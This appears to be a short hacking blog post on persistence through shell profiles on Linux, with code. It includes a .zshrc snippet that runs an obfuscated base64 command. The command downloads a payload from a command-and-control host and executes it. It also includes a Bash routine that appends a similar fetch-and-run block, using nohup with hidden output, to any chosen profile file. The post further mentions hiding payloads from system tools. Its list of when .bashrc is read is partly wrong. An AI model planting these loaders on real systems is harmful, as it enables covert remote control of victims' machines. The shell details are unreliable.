Just a quick piece on persistence using shell profiles and a bit of Bash :)
So, what's persistence ?. It's setting up a way to let a payload / script run, to get access back to a system we gained access to, so we can keep working :), and why shell profiles, because we can be sure that they will run some time, and most users don't really check their shell profiles, so there's a chance we can fly under the radar, at least for a bit.
The second reason is that if we got a ordinary user account, and can't get root, so we can't write to system files, we can almost always write to the users files and that includes config files, so if everything else faiis, shell profiles are a good candidate for entry level access.
And the last reason is that we can use any kind of command we can issue in a shell, including bash scripting, so we can do some pretty advanced stuff in an easy way, using standard shell programming language and functions.
So, what files do we need to look at, and for what ?
It depends on what shell it is, so let's take a peek, and start find what shell we work with. In a terminal, run this
echo $SHELL
/usr/bin/zshWhen I run "echo $SHELL", it says it's /usr/bin/zsh, so my config file would be .zshrc, located in my /home/user dir. So, how do we use it ?
We simply open the file in a text editor, and add something like this
if [ -f /tmp/PAYLOAD ]; then
rm /tmp/PAYLOAD && echo "Y3VybCAtcyBodHRwOi8vMTAuMC4wLjkzL3BheWxvYWRzL0ZBTU9VU19RVUFMSVRZICA+IC90bXAvRkFNT1VTX1FVQUxJVFk7Y2htb2QgK3ggL3RtcC9GQU1PVVNfUVVBTElUWTsvdG1wL0ZBTU9VU19RVUFMSVRZICYK" | base64 -d | /bin/bash
else
echo "Y3VybCAtcyBodHRwOi8vMTAuMC4wLjkzL3BheWxvYWRzL0ZBTU9VU19RVUFMSVRZICA+IC90bXAvRkFNT1VTX1FVQUxJVFk7Y2htb2QgK3ggL3RtcC9GQU1PVVNfUVVBTElUWTsvdG1wL0ZBTU9VU19RVUFMSVRZICYK" | base64 -d | /bin/bash
fi
It's just a quick Bash if/else statement that checks if the payload is allready setup in tmp, if it is, it removes it and installs it again, and if it isn't it simply just downloads and run it.
Now, every time I open a new interactive shell, a normal terminal window, this condition fires, and load the payload, giving me a shell back in the C2 system.
A somewhat better version of a profile file could be like this. Here it's a Bash function that, when it runs ask for a file location, and write the lines we need into the profile file.
#function to set up Shell persistence in normal user context.
echo "Enter Shell profile file and path"
read -p "Enter file path" profilepath
cat >> "$profilepath" << EOF
if [ -f /tmp/PAYLOAD ]; then
rm /tmp/PAYLOAD
curl -s http://PAYLOAD_SERVER/payloads/PAYLOAD > /tmp/PAYLOAD
chmod +x /tmp/PAYLOAD
nohup /tmp/PAYLOAD >/dev/null 2>&1 &
#disown
else
curl -s http://PAYLOAD_SERVER/payloads/PAYLOAD > /tmp/PAYLOAD
chmod +x /tmp/PAYLOAD
nohup /tmp/PAYLOAD >/dev/null 2>&1 &
#disown
fi
EOF
echo "Patched profile file - verify manually..."
}So, why nohup ?. Because if you're not using it, your payload dies when the user exits the shell, and the redirection is for hiding the output, so nothing suspicious is showing up in the terminal.
Yes, I would like to point out that this will fire a new payload when the shell is run, so add your own checks for that, so it only runs once, or depending on what C2 you run, get it to drop redundant connect back shells.
The reason I don't, is that it would include using system tools like grep and PS, and I hide my payloads from normal system tools, so it wouldn't make much sense to include functions like that.
Now, what about Bash ? That's almost as simple, but not quite.
/etc/skel/.bashrc - This file is used as a skeleton file when new users are added, so if you put anything in here, it will get added to the new users .bashrc file. To edit this file, you need root rights.
/home/userx/.bashrc - This file is used every time the user opens a new terminal, if it's Bash.
/root/.bashrc - This is the root users bashrc
Bashrc get's read in the following situations.
- When you log in,
- When you run certain commands (bash scripts),
- When copying error files or output,
- When you run compute jobs,
- At the end of a job
Now, there's another file there's interesting to us, the .profile file. the ksh, Bourne,Bash,Tcsh and Csh shell reads it, so using that is also a good bet, and yes, like the other files it's standard Bash scripting.
So, there you go, installĀ a virtual machine and play around with these files and see how it works ;)
Much Happy Hacking ;)